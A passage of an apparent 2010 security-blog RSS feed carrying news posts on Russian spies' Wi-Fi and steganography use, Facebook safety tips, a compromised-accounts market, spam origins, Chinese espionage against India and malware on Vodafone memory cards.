		<description><![CDATA[Some of the details are beginning to emerge about the 10 Russian spies that were captured in the US. According to an article on The Register, the spies communicated with Ad-Hoc Wi-Fi networks and hid messages in pictures using Steganography. FBI agents monitored 28 year old Russian spy Anna Chapman as she communicated with a &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/06/22/russian-spies-used-wi-fi-and-steganography/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<div>
<p>Some of the  details are beginning to emerge about the 10 Russian spies that were  captured in the US. According to an article on <a title="Russian Spy  Ring" href="http://www.theregister.co.uk/2010/06/29/spy_ring_tech/page2.html" target="_blank">The Register</a>, the spies communicated with Ad-Hoc  Wi-Fi networks and hid messages in pictures using <a title="Steganography - Wikipedia" href="http://en.wikipedia.org/wiki/Steganography" target="_blank">Steganography</a>.</p>
<p>FBI agents monitored 28 year old Russian  spy Anna Chapman as she communicated with a Russian government  official. Anna would go to a book store and using her laptop, created an  Ad-Hoc Wi-Fi connection to a Russian contact who was outside the store:</p>
<blockquote><p>Surveillance agents nearby used “a  commercially available tool that can  detect the presence of wireless  networks” to witness the creation of the ad hoc  networks. NetStumbler  is probably the most popular example of such software. Law enforcement  agents were able to detect a particular MAC address – MAC  address A –  at the time that Chapman was observed powering on her laptop  computer,”  the complaint says. Law enforcement agents were also able to determine  that the electronic  device associated with MAC address A created the ad  hoc network.”</p></blockquote>
<p>The spies also embedded secret messages  in pictures and uploaded them to sites where Russian officials retrieved  them, and decoded the messages.</p>
<blockquote><p>A New Jersey search uncovered a network  of websites, from which the alleged  spies had downloaded images. “These  images appear wholly unremarkable to the naked eye,” the complaint   explains. “But these images (and others) have been analyzed using the  steganography  program. As a result of this analysis, some of the images  have been revealed as  containing readable text files.”</p></blockquote>
<p>It is interesting to see the tactics  used by modern spies. Of course Russia is denying any and all  involvement. Kudos to the FBI for taking them down.</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/06/22/russian-spies-used-wi-fi-and-steganography/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>10 Facebook Don&#8217;ts</title>
		<link>http://techblog.cyberphunkz.com/2010/06/14/10-facebook-donts/</link>
		<comments>http://techblog.cyberphunkz.com/2010/06/14/10-facebook-donts/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 15:07:18 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=584</guid>
		<description><![CDATA[Facebook is more popular than ever. The site frequently goes through changes, but how many people use the same schedule of improvements on their own profile? The new features added to Facebook are opening new windows for vulnerability. A compromised account is a backdoor to more serious attacks on email or banking. Today I will show you 10 things you &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/06/14/10-facebook-donts/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Facebook is more popular than ever. The site frequently goes through changes, but how many people use the same schedule of improvements on their own profile? The new features added to Facebook are opening new windows for vulnerability. A compromised account is a backdoor to more serious attacks on email or banking.</p>
<p>Today I will show you 10 things you should <strong>stop</strong> doing on Facebook in order to take back your security and close the open door.</p>
<p>-Stop posting your phone numbers. Last week I explored a Facebook attack that harvests the phonebook feature. Remember that your number is exposed to your friends, and therefore you&#8217;re relying on their security practices as well as your own to protect you. If a phisher can spoof your number, they have an extra layer of authenticity in convincing your friends you are in trouble and need money fast.</p>
<p>-Put down the games. I know the Mafia can&#8217;t take Cuba without you, but it&#8217;s time to stop. The top games on Facebook have been hacked, and it&#8217;s just a matter of time before the one you play is next. It&#8217;s arguable that the damage is already done with the games and applications you&#8217;ve already allowed, but don&#8217;t sign up for any new ones! Third party apps are not guaranteed to be secure, and you should not trust them with your credentials.</p>
<p>-Don&#8217;t trust chat. It shouldn&#8217;t take Chris Hansen to tell everyone that the person on the other end of your chat session could be anyone. The chat feature on Facebook should be treated as a public conversation. Never give out any private information, even if you&#8217;re positive you are talking to your friend.</p>
<p>-Refresh your personal info. Take a fresh look at your profile from the perspective of a social engineer. Does your profile tell a story about you? What information can you cut out? Many security questions ask about personal details about primary school and pets. Delete any photos or profile details that may relate to those kinds of questions.</p>
<p>-Don&#8217;t use the lazy emails. Facebook will fill your email inbox with notifications, and the links to easily respond. Instead of following the links in email, open up a fresh tab and go to facebook.com directly. Facebook and most social networks are targets for email spoofing. Otherwise you&#8217;ll be entering your login password at facebock.com!</p>
<p>-Don&#8217;t friend acquaintances. Think of the friends list as a circle of trust. If you don&#8217;t know the person well enough to trust their<br />
security savvy, than you&#8217;re very unlikely to recognize the behavior of a phisher pretending to be them. 500 friends means 500 possible inroads to a social engineering or phishing attack. Tone down the number.</p>
<p>-Don&#8217;t keep an old password! Changing your password short circuits many trivial forms of attack. Facebook is a high risk target for Identity Theft, especially if you&#8217;re using applications frequently. How about doing it now!</p>
<p>-Photos are forever. Make it clear to your friends and family that you do not want those pictures of you in your birthday suit on anyone&#8217;s profile. (As opposed to the one of you in a suit on your birthday!) Pictures give behavioral information to an attacker. Bruce Schneier calls this &#8220;incidental data&#8221; in his <a href="http://www.schneier.com/blog/archives/2009/11/a_taxonomy_of_s.html">Taxonomy of Social Networking Data</a>. There he makes the assumption that incidental data is information that you did not create about yourself, and therefore do not control. I would add that although much of it is outside your control, there are ways to influence your friend&#8217;s posting behavior overall. Also, Facebook gives users the ability to &#8220;untag&#8221; themselves in pictures. While the damage is already done in the short term, you&#8217;ve influenced long term vulnerability.</p>
<p>-Don&#8217;t forget @mentions. This new feature brings more incidental data. Be respectful of your neighbor&#8217;s privacy. Ask yourself if having a friend&#8217;s entire profile pinned to your comment like a big arrow is actually necessary for the joke to be funny.</p>
<p>-Don&#8217;t trust other websites. Facebook is everywhere now. The same trust rules apply to the Facebook Login feature that is spreading to other websites. If you don&#8217;t trust the website you&#8217;re on, then signing in with the Facebook credential does not give you an added layer of protection, but rather hands your password to strangers.</p>
<p>This list may seem counterproductive to the efforts Facebook makes to create a global connected community. While I am interested in being a part of such a community, I go into it with eyes open. Just like wearing a wallet belt when I go to huge tourist destinations, I want to be smart about visiting the hugely popular social networking sites online. It may not be the coolest thing to do, but in the end I found that my friends didn&#8217;t even notice I had taken these safety precautions. Now the camera bag I stuffed in my shirt&#8230; that was a different matter.</p>
<p><strong>Original source: </strong><br />
<a href="http://erratasec.blogspot.com/2009/11/10-facebook-donts.html" target="_blank">http://erratasec.blogspot.com/2009/11/10-facebook-donts.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/06/14/10-facebook-donts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Get Advanced SystemCare Pro 3 for free &#8212; this week only!</title>
		<link>http://techblog.cyberphunkz.com/2010/05/17/get-advanced-systemcare-pro-3-for-free-this-week-only/</link>
		<comments>http://techblog.cyberphunkz.com/2010/05/17/get-advanced-systemcare-pro-3-for-free-this-week-only/#comments</comments>
		<pubDate>Mon, 17 May 2010 05:53:30 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[software]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=568</guid>
		<description><![CDATA[Whenever there&#8217;s a new post about cleaning, maintenance, or tune-up apps on Download Squad, it seems like there&#8217;s always at least one commenter who proclaims their affinity for Advanced SystemCare. And with good reason: SystemCare does a good job of cleaning up temp files and browsing traces (including Flash cookies), tuning the Windows registry, and &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/05/17/get-advanced-systemcare-pro-3-for-free-this-week-only/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<div><img src="http://www.blogcdn.com/www.downloadsquad.com/media/2010/05/advanced-sys-care.jpg" border="0" alt="" hspace="4" vspace="4" width="580" height="372" /></div>
<p>Whenever there&#8217;s a new post about cleaning, maintenance, or tune-up apps  on Download Squad, it seems like there&#8217;s always at least one commenter  who proclaims their affinity for <a href="http://iobit.com/advancedwindowscareper.html">Advanced SystemCare</a>.  And with good reason: SystemCare does a good job of cleaning up temp  files and browsing traces (including Flash cookies), tuning the Windows  registry, and it can even clean up some basic spyware.</p>
<p>Advanced SystemCare does other neat things too: it bundles other useful  little apps to handle other tasks like driver backup, drive space  analysis, uninstalling programs, finding duplicate files, editing your  context menu, managing startup items, fixing broken shortcuts, and  optimizing and freeing RAM.</p>
<p>The pro version offers a few other improvements, like automated  maintenance, deeper registry scanning, and smart disk defrag.</p>
<p>Better still, IObit is <a href="http://db.iobit.com/license-free/asc-free-license.php">giving away  Advanced SystemCare 3 Pro</a> for (about) 360 hours to celebrate the  program&#8217;s 5th birthday! All you have to do is <a href="http://db.iobit.com/license-free/asc-free-license.php">visit the  giveaway page</a>, tick a radio button, and agree to the terms. You  won&#8217;t be eligible for tech support, but that&#8217;s not really a major  downside.</p>
<p>Two quick notes: the verification code is case-sensitive, and the  installer will open two IObit web pages when complete. Other than that,  the process is annoyance-free.</p>
<p>[via <a href="http://news.softpedia.com/news/IObit-s-72-Hour-Birthday-Giveaway-142115.shtml">Softpedia</a>]</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/05/17/get-advanced-systemcare-pro-3-for-free-this-week-only/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>1.5 million Facebook accounts offered for sale &#8211; FAQ</title>
		<link>http://techblog.cyberphunkz.com/2010/04/27/1-5-million-facebook-accounts-offered-for-sale-faq/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/27/1-5-million-facebook-accounts-offered-for-sale-faq/#comments</comments>
		<pubDate>Tue, 27 Apr 2010 02:41:48 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[facebook]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=564</guid>
		<description><![CDATA[In their latest “Weekly Threat report”,VeriSign’s iDefense Intelligence Operations Team has profiled the underground market proposition of someone claiming to have 1.5 million compromised Facebook accounts available for sale. The pricing method is based on the number of contacts per compromised account, presumably with the idea to allow easier spreading of related malicious content across &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/27/1-5-million-facebook-accounts-offered-for-sale-faq/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>In their latest “Weekly Threat report”,<strong><a href="http://labs.idefense.com/">VeriSign’s iDefense Intelligence Operations Team</a></strong> has profiled the underground market proposition of someone claiming to have 1.5 million compromised Facebook accounts available for sale.</p>
<p>The pricing method is based on the number of contacts per compromised account, presumably with the idea to allow easier spreading of related malicious content across Facebook.</p>
<p>Here’s an excerpt from the report, and a brief FAQ on the underground ad.</p>
<ul>
<li>“On Feb. 10, 2010, (cybercriminal) stated that he or she is selling 1.5 million compromised Facebook accounts, in bulk quantities, belonging to users in various countries. The price per 1,000 accounts varies based upon the number of friends and contacts that each account possesses. For a purchase of compromised accounts containing 10 contacts or fewer, a buyer must pay $25 per 1,000 accounts. A purchase of compromised accounts containing 10 or more contacts requires a buyer to pay $45 per 1,000 accounts. Accounts containing zero contacts are also available for bulk purchasing from (cybercriminal), at the cost of $15 per 1,000 accounts. The prices of these accounts are presumably in USD or the equivalent amount in some form of electronic currency.”</li>
</ul>
<p>Sometimes, there’s no honor among cybercriminals (<strong>Phishers increasingly scamming other phishers</strong>), just like there isn’t among “real life” thieves.</p>
<p>From the distribution of backdoored web interfaces to web malware exploitation kits, to the actual “binding” of additional malware to the original release, sophisticated or at least cybercriminals with experience, have realized that there are thousands of potential cybercriminals that could unknowingly start working for them. The process of “<em>cybercriminals attempting to scam novice cybercriminals</em>” demonstrates just how vibrant the ecosystem has become these days.</p>
<p>With a huge percentage of the underground marketplace driven by reputation, this is exactly what this particular seller of Facebook data is missing. Moreover, with quality assurance now an inseparable part of the cybercrime ecosystem, the seller is not just skipping the time frame in between which the accounts were compromised, he is also not mentioning have many of them are actually verified as working.</p>
<p>These, and several other factors make me skeptical on the quality of this underground proposition.</p>
<p><strong>If we consider that the cybercriminal’s claims to be true, how did he manage to obtain 1.5 million Facebook accounts?</strong></p>
<p>The ad is clearly stating that they are accounts with contacts, meaning they’re compromised, and other which have zero contacts, meaning they’ve been automatically generated by outsourcing the CAPTCHA-solving process to international teams specializing in the process.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-564"></span></p>
<p>The compromised accounts could have been obtained through the emerging <strong>Cybercrime-as-a-Service (CaaS) market model</strong>. For instance, if he has paid $100 for 3GB of raw crimeware data, and the data mining allowed him to compile a list of 1.5m Facebook accounts, based on the current price, he’ll <a href="http://en.wikipedia.org/wiki/Break-even"><strong>automatically break-even</strong></a>.</p>
<p>Phishing campaigns shouldn’t be excluded as a possibility, however, it remains unclear whether the seller has launched them personally, or managed to purchase the raw data from someone else.</p>
<p><strong>What kind of a business model within the cybercrime ecosystem would allow him to sell the data so cheaply, and still make a profit?</strong></p>
<p>It’s a business model with an ever-decreasing cost of supply, based on the currently active “<em>malicious economies of scale</em>” phrase. This efficiency-driven cybercrime model is in fact so successful, that whether consciously or subconsciously, cybercriminals are realizing the <a href="http://en.wikipedia.org/wiki/Market_liquidity"><strong>basics of market liquidity</strong></a>, and the <a href="http://en.wikipedia.org/wiki/Time_value_of_money"><strong>time value of “underground goods”</strong></a>, in particular the decreasing future value of assets like the Facebook accounts — the value becomes zero when the affected user changes his password from a malware-free host.</p>
<p><strong>Why would a cybercriminal want access to your Facebook account?</strong></p>
<p>For a variety of fraudulent reasons, all of them exploiting the already established trust relationship between the compromised account’s holder and his network of friends.</p>
<p>From “<strong><a href="http://en.wikipedia.org/wiki/Advance-fee_fraud#E-mail_hijacking.2Ffriend_scams">money transfer schemes</a></strong>” where the fraudster is supposedly stuck somewhere and requires cash, to a malware campaign relying on nothing else but a status message leading to a client-side exploits serving site. Your network of friends, turns into his network for propagation of fraudulent/malicious schemes and campaigns.</p>
<p><a href="http://labs.idefense.com/"><strong>VeriSign’s iDefense</strong></a> also makes an interesting observation.</p>
<p>With Facebook’s user base growing to 300 million people across the globe, this indispensable marketing platform can be easily integrated into the cybercriminal’s arsenal, with localized and targeted social engineering attacks relying on basic market segmentation, launched with the idea to achieve a higher conversion rate, compared to mass marketing approaches.</p>
<p>Fact or fiction, based on the ad’s content, this is perhaps <strong>the perfect time to change your Facebook password from a malware-free host</strong>, since a strong password is just as weak as the weak one in general if there’s malicious code present on the system.</p>
<p>Written By :<a href="http://blogs.zdnet.com/security/?p=6304&amp;tag=nl.e550"> Dancho Danchev</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/27/1-5-million-facebook-accounts-offered-for-sale-faq/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>India is a Spamming Hub</title>
		<link>http://techblog.cyberphunkz.com/2010/04/08/india-is-a-spamming-hub/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/08/india-is-a-spamming-hub/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 04:14:46 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=551</guid>
		<description><![CDATA[Wonder where all those annoying spam messages come from? Who sends them? Well, you have got some answers here. Panda Security, a player in antivirus and preventive technologies segment, has stated in its report that India is the world&#8217;s number two spammer. Surprised? Even we were. Panda Security has released a report stating that Brazil, &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/08/india-is-a-spamming-hub/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span>Wonder where all those annoying spam messages come from? Who sends them? Well, you have got some answers here. Panda Security, a player in antivirus and preventive technologies segment, has stated in its report that India is the world&#8217;s number two spammer. Surprised? Even we were.</p>
<p>Panda Security has released a <a href="http://www.pandasecurity.com/homeusers/media/press-releases/viewnews?noticia=10111" target="_blank">report </a>stating that Brazil, India, Korea, Vietnam and U.S. head the list of countries from which most spam was sent during the first two months of the year 2010. With respect to the cities from which spam was being sent, Seoul was first in the list, followed by Hanoi, New Delhi, Bogota, Sao Paulo and Mumbai.</p>
<p>The five million emails analyzed by PandaLabs came from a total of almost one million different IP addresses. This shows that the spam is mostly sent from zombie computers belonging to a botnet. This way, the computers of the infected users themselves are those which send the spam. The cybercrooks have thousands of computers at their disposal, which do the dirty work for them.</p>
<p>Spam is nothing but a business and is used primarily either to distribute malware or sell/advertise all type of products. Therefore, as long as there are users, no matter if they are few, who trust these messages, it&#8217;s enough to continue betting on it.</p>
<p></span></p>
<p><span><img src="http://images.techtree.com/ttimages/story/110153_spam_origin1_600_400.jpg" border="0" alt="" hspace="0" vspace="0" align="baseline" /></span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/08/india-is-a-spamming-hub/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Chinese Hackers Target Indian Government</title>
		<link>http://techblog.cyberphunkz.com/2010/04/08/chinese-hackers-target-indian-government/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/08/chinese-hackers-target-indian-government/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 04:11:51 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Hoaxes]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Military]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[chinese hackers]]></category>
		<category><![CDATA[cyber warfare]]></category>
		<category><![CDATA[indian government]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=548</guid>
		<description><![CDATA[Cyber security researchers and analysts have uncovered the existence of a spy network based in China that was used to steal sensitive, classified government documents from India &#8211; as well data from the Dalai Lama&#8217;s office and the United Nations. The &#8220;Shadow Network&#8221;, as this network is now known, has been traced to two people &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/08/chinese-hackers-target-indian-government/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span>Cyber security researchers and analysts have <a href="http://news.cnet.com/8301-27080_3-20001857-245.html" target="_blank">uncovered</a> the existence of a spy network based in China that was used to steal sensitive, classified government documents from India &#8211; as well data from the Dalai Lama&#8217;s office and the United Nations.</p>
<p>The &#8220;Shadow Network&#8221;, as this network is now known, has been traced to two people living in Chengdu, China.<br />
China is largely believed to possess a Cyber Warfare Doctrine that is designed to achieve global &#8220;electronic dominance&#8221; by 2050. With a yearly budget of $55 million allotted for it and over 10,000 hackers working in tandem, China is second only to U.S. when it comes to cyber snooping prowess.</p>
<p>As more details <a href="http://www.scribd.com/doc/29435784/SHADOWS-IN-THE-CLOUD-Investigating-Cyber-Espionage-2-0" target="_blank">emerge</a> about the intentions of these hackers, it is clear that they had targeted the upcoming Commonwealth games in India. The idea was to make Commonwealth games an utter failure later this year. The plans included studying the network architecture of the entire Commonwealth games IT infrastructure. This includes ticket sales, online registration servers all of which would crash at the time of the inaugural ceremony. The hackers had also looked into tender documents for the Commonwealth games network infrastructure. Intelligence agencies feel this could be for studying vulnerabilities in the system for possible attacks.</span></p>
<p><span></p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-548"></span>This is obviously not the first time India was under from these Chinese hackers. In 2008 and 2009 too, there were many incidences of small attacks on computers of the Indian Ministry of External Affairs. As many as 450 computers belonging to the India Government &#8211; including that of the then National Security Adviser (NSA) M.K. Narayanan and Deputy NSA Shekhar Dutt and the chiefs of the navy, army and air force besides officials in the defense intelligence agencies were infected. Finally, the infected computers were taken offline and replaced.</p>
<p>As to how the latest attacks happened, the modus operandi was simple. Individuals in the ministries were sent emails from a genuine looking nic.in mail address. The email had a PDF attachment that was infected. Accounts on Twitter, Yahoo Mail, Google Groups, Blogspot and other social-networking sites were used to update compromised computers and to host malware, according to the report.</p>
<p>Isn&#8217;t it high time that we pull up our socks and deal with this grave security threat? </span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/08/chinese-hackers-target-indian-government/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>3,000 New HTC Magic Phones Sold with Malware</title>
		<link>http://techblog.cyberphunkz.com/2010/04/08/3000-new-htc-magic-phones-sold-with-malware/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/08/3000-new-htc-magic-phones-sold-with-malware/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 04:08:29 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[htc magic]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[vodafone]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=545</guid>
		<description><![CDATA[Update: Trend Micro Researchers were alerted to the discovery of a malware that came preinstalled on a Vodafone mobile phone handset. Its memory card was also believed to carry malware in it. Vodafone has been taking the heat for packing malware straight out of the box on their HTC Magic Android smartphones. The recipient of &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/08/3000-new-htc-magic-phones-sold-with-malware/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span><em>Update: Trend Micro Researchers were alerted to the discovery of a malware that came preinstalled on a Vodafone mobile phone handset. Its memory card was also believed to carry malware in it. Vodafone has been taking the heat for packing malware straight out of the box on their HTC Magic Android smartphones.</p>
<p>The recipient of one of the malware-laden phones was an employee of the Spanish antivirus firm Panda Security. Plugging the phone in via USB into any PC quickly led to an infection by WORM_SILLY.QT. Vodafone has already released an official statement saying that the infected phone problem was an isolated one.</em></p>
<p>Vodafone Spain has <a href="http://www.itworld.com/%5Bprimary-term%5D/101644/malware-infected-memory-cards-3000-vodafone-mobiles" target="_blank">revealed</a> that at least 3,000 users may have been exposed to the Mariposa malware, which made its way into users&#8217; computers via the cell phone&#8217;s storage. The carrier had shipped HTC Magic phones with infected MicroSD cards from where the malware spread to PCs.</p>
<p>Vodafone is now offering to replace the microSD cards for infected phones. The company maintains that the incident is just an isolated and local one. This is probably the first time a phone has been shipped with a virus inside. Vodafone&#8217;s idea to change the memory card isn&#8217;t much of a solution to the problem.</span></p>
<p><span></p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-545"></span>It was late last year that the Mariposa Working Group, the Georgia Tech Information Security Center, Panda Security, and other international security experts worked together to curb the effects of the &#8220;Mariposa&#8221; botnet. It has affected over 12,000,000 individual computers since May 2009.</p>
<p>Even though the threat was neutralised back then and the perpetrators arrested, there are quite a few affected computers left in the world even now. This Mariposa laden microSD cards just gave the botnet another opportunity to infect computers. It was an employee of Panda Security who first discovered this problem earlier this month. It is currently estimated that up to 3,000 phones might have been affected by the bot. If you bought one of those Vodafone branded HTC Magics, you might want to scan your memory card once before using!<br />
</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/08/3000-new-htc-magic-phones-sold-with-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New IT Term of the week</title>
		<link>http://techblog.cyberphunkz.com/2010/04/06/new-it-term-of-the-week/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/06/new-it-term-of-the-week/#comments</comments>
		<pubDate>Tue, 06 Apr 2010 13:31:06 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[easter]]></category>
		<category><![CDATA[Easter egg]]></category>
		<category><![CDATA[it term]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=541</guid>
		<description><![CDATA[Easter egg Software easter eggs are secret screens, videos, graphics, or other type of message that has been buried in an application. Typically, easter eggs are used to display the credits for the development team or to display a humorous message. Easter eggs are intended to be fun and can be found in any type &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/06/new-it-term-of-the-week/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong>Easter egg </strong></p>
<hr size="2" />Software easter eggs are secret screens, videos, graphics, or other type of message that has been buried in an application. Typically, easter eggs are used to display the credits for the development team or to display a humorous message. Easter eggs are intended to be fun and can be found in any type of software ? including games, word processing applications, and even operating systems. To see an easter egg, you often will need know a special procedure or sequence of keystrokes.</p>
<p>For example, follow these instructions to see a list of people who worked on the User Assistance feature of Microsoft Word 2000:</p>
<p>1. Open Microsoft Word2000</p>
<p>2. Press F1 or click the &#8220;Office Assistant&#8221; button</p>
<p>3. Under the &#8220;What would you like to do?&#8221;, type &#8220;Cast&#8221; (No quotes)</p>
<p>4. Click SEARCH</p>
<p>5. Click the MICROSOFT OFFICE 2000 USER ASSISTANCE STAFF topic</p>
<p>6. Click the graphic in the Microsoft Word Help screen</p>
<p>Easter eggs in computer games are quite common and may be funny scenes, hidden levels, or other extras gamers can discover while playing. One of the most popular easter eggs to unlock in video games is the &#8220;Dopefish&#8221;. This fun, fictional fish first appeared in Commander Keen: Secret of the Oracle (1991). Since that time it has made an appearance as an easter egg in numerous games. In many games you need to unlock a special level or perform a sequence of actions to find the hidden easter egg.</p>
<p>Easter eggs may also be found in movies, music albums, videos and other types of media.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-541"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/04/06/new-it-term-of-the-week/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacker held for duping job aspirants</title>
		<link>http://techblog.cyberphunkz.com/2010/04/06/hacker-held-for-duping-job-aspirants/</link>
		<comments>http://techblog.cyberphunkz.com/2010/04/06/hacker-held-for-duping-job-aspirants/#comments</comments>
		<pubDate>Tue, 06 Apr 2010 13:29:05 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[delhi]]></category>
		<category><![CDATA[jobs]]></category>
		<category><![CDATA[unethical hacking]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2010/04/06/hacker-held-for-duping-job-aspirants/</guid>
		<description><![CDATA[Mohit Sharma Apr 03, 2010 http://www.indianexpress.com/news/hacker-held-for-duping-job-aspirants/599464/ The Delhi Police arrested a professional hacker on Friday who led a gang which allegedly duped hundreds of youths by promising them jobs as technicians and airline crew. Police identified the accused as Amritesh and said they are raiding several places in Delhi to nab his associates. Amritesh, the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/04/06/hacker-held-for-duping-job-aspirants/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Mohit Sharma</p>
